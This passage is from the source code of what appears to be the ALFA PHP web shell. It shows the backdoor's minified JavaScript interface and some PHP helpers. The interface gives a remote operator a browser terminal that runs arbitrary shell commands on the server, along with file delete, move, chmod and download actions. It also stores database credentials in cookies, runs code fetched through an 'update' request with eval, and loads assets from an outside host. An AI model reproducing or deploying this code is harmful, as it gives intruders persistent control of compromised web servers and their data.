i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+i)}});try{i.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t&&($("filesman_holder").style.minHeight="0",t=".FilesMan"),_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var i=e.getAttribute("opt_id");if($(i).remove(),-1!=$("tab_"+i).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var a=e[0].getAttribute("opt_id");null!=$(a)&&$(a).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+i+"]").remove()}function closeOption(e,t){t.stopPropagation();var i=e.getAttribute("opt_id");if($(i).remove(),-1!=$("tab_"+i).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var a=e[0].getAttribute("opt_id");null!=$(a)&&$(a).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+i+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var i=e.getAttribute("term_id");if(($(i).remove(),-1!=$("tab_"+i).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var a=e[0].getAttribute("term_id");null!=$(a)&&$(a).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+i+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var i=e.getAttribute("opt_id");if(($(i).remove(),-1!=$("tab_"+i).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var a=e[0].getAttribute("opt_id");null!=$(a)&&$(a).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+i+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var i=null;void 0===t?i=e.getAttribute("opt_id"):(i=e,e=$("tab_"+i));var a=editor_files["file_"+i.replace("editor_source_","")];if(void 0!==a&&(d.querySelector(".editor-path").innerHTML=(a.pwd+"/"+a.file).replace(/\/\//g,"/")),null==i)return!1;$(i).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var i=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=i,t.style.visibility=i>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",i="",a="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",i=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+a+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+a+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+a+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+a+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+a+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+a+'\');" term_id="'+a+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+a+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+a+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+a+'" id="tab_'+a+'" class="terminal-tab'+i+'">Terminal <img term_id="'+a+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[a]={index:0,key:-1},d.querySelector("#"+a+" .php-terminal-input").focus(),d.querySelector("#"+a+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(a),php_temrinal_using_cgi=!0;var r=alfaGetTerminalHistory();for(var o in r)d.querySelector("#"+a+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+a+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+r[o]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),i=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==i&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=i)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var i=d.querySelector("#"+e+" pre.ml1"),a=parseInt(window.getComputedStyle(i,null).getPropertyValue("font-size")),r="";1==t?(r=a+1+"px",i.style.fontSize=r):(r=a-1+"px",i.style.fontSize=r),setCookie("alfa-terminal-fontsize",r,2012)}function alfaWalkInTerminalHistory(e,t,i){var a=t||window.event;if("38"==a.keyCode||"40"==a.keyCode||"37"==a.keyCode||"39"==a.keyCode)switch(a.keyCode){case 38:var r=alfaGetTerminalHistory(!0),o="";0==terminal_walk_index[i].index?(0==terminal_walk_index[i].key&&++terminal_walk_index[i].index,void 0!==(o=r[terminal_walk_index[i].index])?(e.value=o,++terminal_walk_index[i].index):(e.value="",terminal_walk_index[i].index=0)):terminal_walk_index[i].index<r.length&&(0==terminal_walk_index[i].key&&++terminal_walk_index[i].index,e.value=r[terminal_walk_index[i].index],++terminal_walk_index[i].index),terminal_walk_index[i].key=1;break;case 40:r=alfaGetTerminalHistory(!0);if(terminal_walk_index[i].index>=0)0!=terminal_walk_index[i].index&&(--terminal_walk_index[i].index,1==terminal_walk_index[i].key&&--terminal_walk_index[i].index),void 0!==(o=r[terminal_walk_index[i].index])?e.value=o:(e.value="",terminal_walk_index[i].index=0);terminal_walk_index[i].key=0;break;default:console.log(a.keyCode)}else terminal_walk_index[i].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var i=t.getAttribute("term_id");return e=d.querySelector("#"+i+" .cmd-history-icon"),d.querySelector("#"+i+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+i+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var a=e.getAttribute("mode"),r=(i=e.getAttribute("term_id"),d.querySelector("#"+i+" .cmd-history-holder"));0==a.length||"off"==a?(r.style.visibility="visible",r.style.opacity="1",e.setAttribute("mode","on")):(r.style.visibility="hidden",r.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),i=e.getAttribute("fname"),a=e.getAttribute("base_id");if(".."==i&&"phar://"!=t.substr(0,7))return!1;var r="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(a)+"&ajax="+alfab64("true");_Ajax(d.URL,r,function(e){if("0"!=e){$("archive_base_"+a).innerHTML=e;var i=$("archive_dir_"+a).getAttribute("archive_name"),r=$("archive_dir_"+a).getAttribute("archive_full"),o="",n="";if(0!=(t=t.split(i)[1]).length){var l=(t=t.split("/")).length-1;for(var c in 0==t[l].length&&t.splice(l,1),t)0!=t.length&&(n+=t[c]+"/",o+='<a base_id="'+a+'" fname="'+t[c]+'" path="'+r+n+'" onclick="alfaOpenArchive(this);">'+t[c]+"/</a>")}d.querySelector("#archive_dir_"+a+" .archive_pwd_holder").innerHTML=o}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var i={};try{i=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}var a=d.querySelector("#"+t+" form[name=sf]");return a.sql_host.value=i[e].host,a.sql_login.value=i[e].user,a.sql_pass.value=i[e].pass,a.sql_base.value=i[e].db,a.sql_count.checked=!0,a.onsubmit(),!1}function alfaShowConnectionHistory(e){var t={},i=e.getAttribute("db_id"),a=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==a){e.setAttribute("mode","off");try{t=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}var r,o=1;for(r in t){var n=t[r].user+"_"+t[r].db;rows+='<tr class="dbh_'+n+'"><th>'+o+"</th><th>"+t[r].host+"</th><th>"+t[r].user+"</th><th>"+t[r].pass+"</th><th>"+t[r].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+n+'","'+i+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+n+"\");'>X</button></th></tr>",o++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+i+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,i={};try{i=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(i[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete i[e],setCookie("alfa_connection_hist",JSON.stringify(i),2012)}function alfaExecTerminal(e,t){var i="";if(0==(i=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==i?i="ls -trh --color":"ll"==i&&(i="ls -ltrh --color");var a=e.getAttribute("term_id");alfaloader(a,"block"),closeHistoryCmd("free",e);var r="";"FORM"==e.tagName&&(r=e.querySelector(".php-terminal-current-dir").innerHTML),0==(r=r.trim()).length&&(r=c_);var o="a="+alfab64("terminalExec")+"&c="+alfab64(r)+"&alfa1="+alfab64(i)+"&ajax="+alfab64("true");if(_Ajax(d.URL,o,function(e,t){alfaloader(t,"none");try{var i=$("tab_"+a);null!=i&&((-1==i.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(i.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",i.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,a),void 0===t){d.querySelector("#"+a+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+a+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+i+"</div>");var n=alfaGetTerminalHistory(),l=n.indexOf(i);-1!=l&&n.splice(l,1),n.push(i),setCookie("alfa-terminal-history",JSON.stringify(n),2012)}d.querySelector("#"+a+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t=getCookie("alfa_files_page_number"),i=e.innerText;if("<<"==i){t=d.querySelector(".active-page-number").innerText;if(!((t=parseInt(t))>1))return!1;i=t-1}if(">>"==i){t=d.querySelector(".active-page-number").innerText;t=parseInt(t);var a=d.querySelector(".last-page-number").innerHTML;if(!(t+1<=(a=parseInt(a))))return!1;i=t+1}setCookie("alfa_files_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),i=t.getElementsByClassName("box");for(a=0;a<i.length;a++)i[a].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var a;i=t.getElementsByClassName("sub-box");for(a=0;a<i.length;a++)i[a].setAttribute("opt_id",e),i[a].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var i=this.innerHTML,a=col_dumper_selected_data[t][e].indexOf(i);-1==a?col_dumper_selected_data[t][e].push(i):col_dumper_selected_data[t][e].splice(a,1)})}function showSymlinkPath(e,t){var i=e.getAttribute("row"),a=$("td_row_"+i),r=e.getAttribute("opt_title"),o=e.getAttribute("fname");if(r=decodeURIComponent(o)+" -> "+r,null!=a){a.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+i+'">'+r+"</div>");var n=t.clientX,l=t.clientY-30;$("link_id_"+i).style.left=n+"px",$("link_id_"+i).style.top=l+"px"}}function hideSymlinkPath(e){$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var i=t.split("=");return e[i[0]]=i[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var i="auto";isArchive(t.file)&&(i="view"),editor(t.path+"/"+t.file,i,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,i="";if(".."==(i="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var a=t.getAttribute("id"),r=t.getAttribute("path"),o=t.getAttribute("ftype"),n=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var l in"file"!=o||isArchive(i)?n[3]="view_archive":n.splice(11,1),"folder"==o&&(n=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(n),n){var c=d.querySelector("#rightclick_menu > a[name="+n[l]+"]");switch(c.setAttribute("fid",a),c.setAttribute("fname",decodeURIComponent(i)),c.setAttribute("path",r),c.setAttribute("ftype",o),n[l]){case"view":case"edit":var s="auto";"edit"==n[l]&&(s="edit"),c.setAttribute("href","#action=fileman&path="+c_+"/&file="+i),c.setAttribute("onclick","editor('"+i+"','"+s+"','','','','file')");break;case"newtab":var u=i;"file"==o&&(u="&file="+i),c.setAttribute("href","#action=fileman&path="+c_+"/"+u);break;case"delete":c.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+i+" # ?'); chk ? g('FilesMan',null,'delete', '"+i+"') : '';");break;case"download":c.setAttribute("onclick","g('FilesTools',null,'"+i+"', 'download')");break;case"permission":try{var f=d.querySelector("#id_chmode_"+a.replace("id_","")+" span").innerHTML;c.setAttribute("perm",f.trim())}catch(e){}break;case"link":c.style.display="block";var m="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",h=(c_+"/"+i).replace(/\/\//g,"/");if(-1!=h.indexOf(m)){m=h.replace(m,"");var p=location.origin+"/"+m;c.setAttribute("href",""+p)}else c.style.display="none"}}var _=e.clientX,b=e.clientY;alfaRightClickMenu(_,b),e.preventDefault()})})}function alfaPopupAction(e,t){var i="",a="";switch(t){case"rename":i="Old file name:",a="New file name:";break;case"copy":i="File path:",a="Enter the file path that you want to copy this file to:";break;case"move":i="Current Path:",a="Enter the file path that you want to move this file to:";break;case"extract":i="Files to extract:",a="Enter the path you wish to extract the files to and click Extract:"}var r=e.getAttribute("fname"),o=e.getAttribute("path"),n=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",n="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var l=e.getAttribute("perm"),c=l.substr(1,1),s=l.substr(2,1),u=l.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(c,"u",["u","g","w"]),autoCheckPerms(s,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var f="move"==t||"copy"==t?o+r:r;if("modify"==t){var m="tr_row_"+e.getAttribute("fid").replace("id_","");f=d.querySelector("#"+m+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=n,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=n,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o+r,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=f,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,i){if(void 0!==i)for(var a in i){var r=i[a];d.querySelector("#shortcutMenu-holder > form input[name="+r+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+r+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+r+"x]").checked=!1}var o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),l=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(o.checked=!0,n.checked=!0,l.checked=!0):"4"==e?o.checked=!0:"2"==e?n.checked=!0:"1"==e?l.checked=!0:"6"==e?(o.checked=!0,n.checked=!0):"3"==e?(n.checked=!0,l.checked=!0):"5"==e&&(o.checked=!0,l.checked=!0);else{var c=0;o.checked&&(c+=4),n.checked&&(c+=2),l.checked&&(c+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=c:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=c)}}function gg(e,t,i,a,r,o){alfaloader("filesman_holder","block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(i)+"&alfa2="+alfab64(a)+"&alfa3="+alfab64(r)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,o,!1,".FilesMan")}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var i=e.getAttribute("fid").replace("id_",""),a=$("id_"+i).getAttribute("fname"),r=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;r=r.trim(),a=a.trim(),gg("doActions",c_,a,r,t,function(e){if("rename"==t)if("done"==e){var a=$("id_"+i);updateFileEditor(i,r);var o=a.getAttribute("path")+$("id_"+i).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,a.addEventListener("animationend",function(){a.classList.remove("textEffect")}),a.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader("filesman_holder","none")});break;case"permission":var o=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,l=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;a=(a=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var c=o.trim()+n.trim()+l.trim();gg("doActions",c_,a,c,t,function(e){alfaloader("filesman_holder","none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":i=e.getAttribute("fid").replace("id_","");var s=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+i).getAttribute("fname");gg("doActions",c_,s,u,t,function(t){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=s,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader("filesman_holder","none")})}}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var i=0;t==editor_current_file&&(i=" is_active"),insertToHistory(t,editor_files[t].file,i,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length){d.body.insertAdjacentHTML("beforeend",e);try{evalJS(e)}catch(e){}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var i in t){for(var a="",r=0;r<t[i].length;r++)a+="useful"==i||"downloader"==i?'<span class="header_values" style="margin-left: 4px;">'+t[i][r]+"</span>":t[i][r];var o=$("header_"+i);o&&(o.innerHTML=a)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501),d.querySelectorAll(".menu_options").forEach(function(e){e.addEventListener("contextmenu",function(e){d.querySelector("#rightclick_menu > a[name=newtab]").setAttribute("href",e.target.getAttribute("href"));var t=e.clientX,i=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(t,i),e.preventDefault()})})},!1);
3366</script>
3367<?php echo "</body>
3368</html>
3369";
3370}}
3371if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
3372function posix_getpwuid($p) {return false;} }
3373if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
3374function posix_getgrgid($p) {return false;} }
3375function alfaWhich($p) {
3376$path = alfaEx('which ' . $p,false,false);
3377if(!empty($path))
3378return strlen($path);
3379return false;
3380}
3381function alfaSize($s) {
3382if($s >= 1073741824)
3383return sprintf('%1.2f', $s / 1073741824 ). ' GB';
3384elseif($s >= 1048576)
3385return sprintf('%1.2f', $s / 1048576 ) . ' MB';
3386elseif($s >= 1024)
3387return sprintf('%1.2f', $s / 1024 ) . ' KB';
3388else
3389return $s . ' B';
3390}
3391function alfaPerms($p) {
3392if (($p & 0xC000) == 0xC000)$i = 's';
3393elseif (($p & 0xA000) == 0xA000)$i = 'l';
3394elseif (($p & 0x8000) == 0x8000)$i = '-';
3395elseif (($p & 0x6000) == 0x6000)$i = 'b';
3396elseif (($p & 0x4000) == 0x4000)$i = 'd';
3397elseif (($p & 0x2000) == 0x2000)$i = 'c';
3398elseif (($p & 0x1000) == 0x1000)$i = 'p';
3399else $i = 'u';
3400$i .= (($p & 0x0100) ? 'r' : '-');
3401$i .= (($p & 0x0080) ? 'w' : '-');
3402$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
3403$i .= (($p & 0x0020) ? 'r' : '-');
3404$i .= (($p & 0x0010) ? 'w' : '-');
3405$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
